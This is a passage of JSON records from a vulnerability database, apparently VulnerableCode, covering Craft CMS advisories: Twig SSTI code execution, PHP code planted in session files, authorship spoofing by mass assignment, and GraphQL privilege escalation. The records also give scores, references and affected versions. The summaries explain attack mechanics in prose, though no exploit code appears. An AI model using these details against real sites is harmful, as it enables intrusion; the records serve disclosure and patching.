},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25495","GHSA-2453-mppf-46cj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jeyh-3jxd-z3g6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57249?format=json","vulnerability_id":"VCID-jsfs-azcs-mfcm","summary":"Craft CMS Contains a Potential Remote Code Execution Vulnerability via Twig SSTI\nCraft CMS contains a potential remote code execution vulnerability via Twig SSTI. 
You must have administrator access and `ALLOW_ADMIN_CHANGES` must be enabled for this to work.\n\nhttps://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n\nNote: This is a follow-up to https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv\n\nUsers should update to the patched versions (4.14.13 and 5.6.15) to mitigate the issue.","references":[{"reference_url":"http://github.com/craftcms/cms/pull/17026","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://github.com/craftcms/cms/pull/17026"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-46731","reference_id":"","reference_type":"","scores":[{"value":"0.00909","scoring_system":"epss","scoring_elements":"0.76214","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-46731"},{"reference_url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-46731","reference_id":"CVE-2025-46731","reference_type
":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-46731"},{"reference_url":"https://github.com/advisories/GHSA-7c58-g782-9j38","reference_id":"GHSA-7c58-g782-9j38","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-7c58-g782-9j38"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-7c58-g782-9j38","reference_id":"GHSA-7c58-g782-9j38","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-7c58-g782-9j38"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv","reference_id":"GHSA-f3cw-hg6r-chfv","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/85041?format=json","purl":"pkg:composer/craftcms/cms@5.6.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnera
bility":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.6.15"}],"aliases":["CVE-2025-46731","GHSA-7c58-g782-9j38"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jsfs-azcs-mfcm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57273?format=json","vulnerability_id":"VCID-jxet-d8ux-mkge","summary":"Craft CMS stores 
arbitrary content provided by unauthenticated users in session files. This content could be accessed and executed, possibly using an independent vulnerability. Craft CMS redirects requests that require authentication to the login page and generates a session file on the server at `/var/lib/php/sessions`. Such session files are named `sess_[session_value]`, where `[session_value]` is provided to the client in a `Set-Cookie` response header. Craft CMS stores the return URL requested by the client without sanitizing parameters. Consequently, an unauthenticated client can introduce arbitrary values, such as PHP code, to a known local file location on the server. Craft CMS versions 5.7.5 and 4.15.3 have been released to address this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-35939","reference_id":"","reference_type":"","scores":[{"value":"0.33065","scoring_system":"epss","scoring_elements":"0.96993","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-35939"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/e4c7bac8f31010aee048409f9ef6f744a83146b2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"ht
tps://github.com/craftcms/cms/commit/e4c7bac8f31010aee048409f9ef6f744a83146b2"},{"reference_url":"https://github.com/craftcms/cms/pull/17220","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-05-07T22:40:17Z/"},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-06-06T03:55:25Z/"}],"url":"https://github.com/craftcms/cms/pull/17220"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.15.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-05-07T22:40:17Z/"},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-06-06T03:55:25Z/"}],"url":"https://github.com/craftcm
s/cms/releases/tag/4.15.3"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.7.5","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-06-06T03:55:25Z/"},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-05-07T22:40:17Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.7.5"},{"reference_url":"https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-147-01.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-05-07T22:40:17Z/"},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-06-06T03:55:25Z/"}],"url":"https://raw.gith
ubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-147-01.json"},{"reference_url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-35939","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-35939"},{"reference_url":"https://www.cve.org/CVERecord?id=CVE-2025-35939","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-06-06T03:55:25Z/"},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-05-07T22:40:17Z/"}],"url":"https://www.cve.org/CVERecord?id=CVE-2025-35939"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-35939","reference_id":"CVE-2025-35939","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E
:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-35939"},{"reference_url":"https://github.com/advisories/GHSA-7vrx-9684-xrf2","reference_id":"GHSA-7vrx-9684-xrf2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-7vrx-9684-xrf2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74789?format=json","purl":"pkg:composer/craftcms/cms@5.7.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh
"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.7.5"}],"aliases":["CVE-2025-35939","GHSA-7vrx-9684-xrf2"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jxet-d8ux-mkge"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50633?format=json","vulnerability_id":"VCID-jxz8-g6fq-dubw","summary":"Craft CMS: Entries Authorship Spoofing via Mass Assignment\nThe entry creation process allows for **Mass Assignment** of the `authorId` attribute. A user with \"Create Entries\" permission can inject the `authorIds[]` (or `authorId`) parameter into the POST request, which the backend processes without verifying if the current user is authorized to assign authorship to others.\n\nNormally, this field is not present in the request for users without the necessary permissions. By manually adding this parameter, an attacker can attribute the new entry to any user, including Admins. 
This effectively \"spoofs\" the authorship.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28781","reference_id":"","reference_type":"","scores":[{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.16153","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28781"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/830b403870cd784b47ae42a3f5a16e7ac2d7f5a8","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:36:36Z/"}],"url":"https://github.com/craftcms/cms/commit/830b403870cd784b47ae42a3f5a16e7ac2d7f5a8"},{"reference_url":"https://github.com/craftcms/cms/commit/c6dcbdffaf6ab3ffe77d317336684d83699f4542","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:36:36Z/"}]
,"url":"https://github.com/craftcms/cms/commit/c6dcbdffaf6ab3ffe77d317336684d83699f4542"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28781","reference_id":"CVE-2026-28781","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28781"},{"reference_url":"https://github.com/advisories/GHSA-2xfc-g69j-x2mp","reference_id":"GHSA-2xfc-g69j-x2mp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2xfc-g69j-x2mp"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-2xfc-g69j-x2mp","reference_id":"GHSA-2xfc-g69j-x2mp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:36:36Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-2xfc-g69j-x2mp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"
vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28781","GHSA-2xfc-g69j-x2mp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jxz8-g6fq-dubw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50075?format=json","vulnerability_id":"VCID-kbrc-85av-nfcn","summary":"Craft CMS: GraphQL Asset Mutation Privilege Escalation\nType: Privilege Escalation (CWE-269)\nAffected: Craft CMS 5.x (likely affects 4.x and 3.x as well)\nLocation: `src/gql/resolvers/mutations/Asset.php lines 
57-107`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25497","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06198","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25497"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/ac7edf868c1a81fd9c4dc49d3b3edf1cce113409","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:18Z/"}],"url":"https://github.com/craftcms/cms/commit/ac7edf868c1a81fd9c4dc49d3b3edf1cce113409"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.17.0-beta.1","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.17.0-beta.1"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVC